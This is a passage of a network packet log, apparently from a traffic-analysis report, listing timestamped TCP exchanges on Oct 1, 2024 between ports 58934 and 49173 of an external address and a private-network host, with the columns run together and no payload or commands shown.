                                                                                                                                Oct 1, 2024 09:25:36.409535885 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409579992 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409590006 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409634113 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.409733057 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409743071 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409749031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409754038 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.409786940 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.410429955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410445929 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410459995 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410469055 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.410469055 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.410501957 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.410598040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410608053 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410618067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410629034 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.410649061 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.410676956 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.411523104 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411533117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411542892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411575079 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.411590099 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411600113 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411609888 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411618948 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.411648989 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.411648989 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.411973953 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.412415028 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412425995 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412436008 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412470102 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412468910 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.412480116 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412491083 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412503004 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.412522078 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.412550926 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.413135052 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413177013 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413187027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413232088 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.413258076 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413271904 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413281918 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413290977 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413307905 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.413336992 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.413976908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413985968 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.413995981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.414028883 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.414225101 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640018940 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640038013 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640063047 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640079021 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640094042 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640094042 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640110016 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640115976 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640126944 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640144110 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640151024 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640188932 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640213966 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640228987 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640270948 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640306950 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640321970 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640364885 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640405893 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640420914 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640435934 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640450954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640460014 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640465975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640490055 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640645981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640661001 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640681982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640691042 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640724897 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640763998 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640779018 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640794039 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640820026 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640881062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640925884 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.640968084 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640983105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.640999079 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641015053 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641022921 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641030073 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641045094 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641053915 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641088009 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641283035 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641298056 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641313076 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641333103 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641335011 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641350985 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641366005 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641381025 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641383886 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641400099 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641582966 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641597033 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641611099 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641625881 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641632080 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641640902 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641663074 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641669035 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641679049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641705990 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641839981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641885996 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.641905069 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641920090 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.641958952 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.642030954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642045975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642060995 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642076015 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642076969 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.642119884 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.642163992 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642225027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642240047 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642255068 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.642266035 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.642293930 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.642736912 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.644979954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645044088 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645086050 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645519972 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645589113 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645605087 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645637989 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645698071 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645713091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645729065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645740986 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645745039 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645767927 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645889044 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645903111 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645919085 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645932913 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645937920 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645947933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645962954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645975113 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645978928 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646004915 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646122932 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646136999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646152020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646167040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646172047 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646182060 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646209955 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646976948 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646998882 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.647023916 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.647243977 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649697065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649739027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649753094 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649790049 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649836063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649849892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649864912 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649879932 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649889946 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649940968 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650051117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650064945 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650079966 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650094986 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650104046 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650110960 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650125980 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650141001 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650142908 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650166035 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650249004 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650264978 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650279999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650294065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650300980 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650340080 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871675968 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871711016 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871725082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871740103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871759892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871855021 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871876955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871884108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871884108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871893883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871933937 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871933937 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871967077 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871980906 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872028112 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872051001 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872066021 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872117043 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872172117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872188091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872201920 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872216940 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872231007 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872232914 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872267008 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872423887 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872438908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872452974 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872464895 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872474909 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872503042 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872558117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872574091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872589111 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872606993 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872618914 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872646093 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872708082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872724056 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872771025 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872808933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872831106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872847080 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872863054 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872875929 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872878075 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872894049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872905016 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872909069 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872924089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872936964 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872963905 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873153925 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873167992 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873182058 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873210907 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873250008 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873265982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873280048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873296976 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873305082 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873310089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873326063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873341084 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873343945 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873357058 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873366117 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873405933 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873610020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873625040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873671055 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873759031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873774052 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873797894 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873809099 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873812914 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873827934 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873842955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873856068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873857975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873873949 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873889923 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873891115 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873904943 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873919010 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873927116 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873934031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873941898 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873950005 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873981953 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874320030 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874335051 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874351025 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874368906 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874397039 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874454975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874475956 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874491930 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874506950 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874521971 CEST5893449173103.186.116.99192.168.2.22
